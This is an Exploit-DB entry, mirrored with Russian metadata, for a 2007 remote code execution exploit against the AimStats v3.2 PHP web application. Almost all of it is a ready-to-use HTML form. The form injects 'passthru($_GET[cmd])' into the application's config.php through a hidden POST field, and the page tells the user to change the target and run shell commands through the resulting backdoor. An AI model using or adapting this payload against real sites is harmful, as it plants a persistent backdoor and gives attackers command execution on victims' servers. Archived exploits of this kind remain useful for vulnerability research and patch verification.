- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 3762
- Проверка EDB
-
- Пройдено
- Автор
- DJ7XPL
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-2168 cve-2007-2167
- Дата публикации
- 2007-04-18
HTML:
<!--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+ +
+ Y! Underground Group +
+ +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+ +
+ Portal......: AimStats v3.2 +
+ Author......: Dj7xpl / [email protected] +
+ Type........: Remote Code Execution +
+ Download....: http://www.x-pose.org/aimstats.php +
+ Page........: http://Dj7xpl.2600.ir +
+ +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+ +
+ Xpl.........: + -->
<html><head><Title>---===AimStats v3.2===------===Dj7xpl===---</title></head>
<body bgcolor="red">
<center>
<form name="AimStats" method="post" action="http://site.com/path to aimstats/process.php?update=yes">
<input name="taglinelimit" value="777" type="hidden" >
<input name="number" value="11; passthru($_GET[cmd]);//;" type="hidden" >
<input type="submit" name="Submit" value="Submit" >
</form><br><br>
<font color="#C0FF3E" size="+1"> Please change Target And Run This Script</font><br>
<font color="#C0FF3E" size="+1"> And See Backdoor into http://[Target]/[Path]/config.php?cmd=shell</font></br>
<font color="#C0FF3E" size="+1"> E.g : http://site.com/aimstats/config.php?cmd=ls -la</font>
</center>
</body>
</html>
<!--
+ +
+ +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -->
# milw0rm.com [2007-04-18]
- Источник
- www.exploit-db.com